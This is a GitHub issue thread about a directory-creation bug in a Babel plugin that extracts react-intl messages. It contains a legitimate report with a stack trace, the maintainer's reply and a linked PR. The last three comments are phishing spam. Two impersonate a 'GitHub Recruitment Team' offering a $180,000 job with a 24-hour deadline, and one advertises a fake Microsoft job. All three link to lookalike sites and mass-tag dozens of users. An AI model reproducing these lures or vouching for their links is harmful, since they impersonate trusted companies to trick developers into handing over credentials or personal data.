### ISSUE TITLE
Problems with creating directories

### ISSUE THREAD

**Issue by JohnLindahlTech** [tarrencev/babel-plugin-react-intl-to-properties#6]
It seems to be a bug at this line:
https://github.com/tarrencev/babel-plugin-react-intl-to-properties/blob/master/src/index.js#L171

The reason why I consider it a bug is that per specification, the last part of the path will be stripped away:

>path.dirname('/foo/bar/baz/asdf/quux')
>// Returns: '/foo/bar/baz/asdf'

my .babelrc-config:

```
        ["react-intl-to-properties", {
          "enforceDescriptions": true,
          "fileName": "server-dev",
          "messagesDir": "dist/translations/"
        }]
```
Resulting in the following error for me when I try to extract translations to a generated directory structure (I added a printout indicating my result of path.dirname() and the file I want to write to):

```
>> dirname: dist
>> propertiesFP: dist/translations/server-prod.properties
Error: src/app/information/trading-status.jsx: ENOENT: no such file or directory, open 'dist/translations/server-prod.properties'
    at Error (native)
    at Object.fs.openSync (fs.js:640:18)
    at fs.writeFileSync (fs.js:1333:33)
    at PluginPass.exit (/Users/johbac/ws/instrument-page/node_modules/babel-plugin-react-intl-to-properties/lib/index.js:148:47)
    at newFn (/Users/johbac/ws/instrument-page/node_modules/babel-traverse/lib/visitors.js:276:21)
    at NodePath._call (/Users/johbac/ws/instrument-page/node_modules/babel-traverse/lib/path/context.js:76:18)
    at NodePath.call (/Users/johbac/ws/instrument-page/node_modules/babel-traverse/lib/path/context.js:48:17)
    at NodePath.visit (/Users/johbac/ws/instrument-page/node_modules/babel-traverse/lib/path/context.js:117:8)
    at TraversalContext.visitQueue (/Users/johbac/ws/instrument-page/node_modules/babel-traverse/lib/context.js:150:16)
    at TraversalContext.visitSingle (/Users/johbac/ws/instrument-page/node_modules/babel-traverse/lib/context.js:108:19)
    at TraversalContext.visit (/Users/johbac/ws/instrument-page/node_modules/babel-traverse/lib/context.js:192:19)
    at Function.traverse.node (/Users/johbac/ws/instrument-page/node_modules/babel-traverse/lib/index.js:114:17)
```

**Comment by tarrencev** [comment]
@JohnPhoto Looks like a bug indeed. Would be happy to accept a PR addressing it

**Comment by JohnLindahlTech** [comment]
Now opened #7 for this purpose.

**Comment by mr-robot77** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
gyrusdentatus, @jonas52, @barceguo, @ylv-io, @elizabethdinella, @yhuag, @akhoshrozeh, @Parsagostar, @0xCRC32, @Jusharra, @Riatre, @aliensyntax, @Jeiwan, @tonybka, @GNURub, @0xDmtri, @1052445594, @0xrinegade, @freegpus, @Gostycw

**Comment by willianfcamara** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
laizy, @ex0dus-0x, @zdenham, @ajq2679, @teknogeek, @cxm95, @0xhamachi, @Hawksbill1234, @moesaleh, @markedconfidential, @Ivshti, @Capo0699, @iKausik, @matmilbury, @smh2028, @calistra, @riccardopersiani, @Ashu999, @Tranquil-Flow, @kavu

**Comment by akashakki** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Join us and be part of a team dedicated to driving innovation and success!

## How to Apply:
To apply for this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.elnegrogato, @Passw, @optout21, @Terysek11, @w20089527, @MajorGeek, @Siim, @ZhuZhiWu-Mr, @esthicodes, @yuuki1224, @Cam, @sarmatkasaev, @exagil, @ElGhaly35, @Gochip, @Wolfof420Street, @ichelsearay, @lgaticaq, @AllanRey01, @Zagorakiss
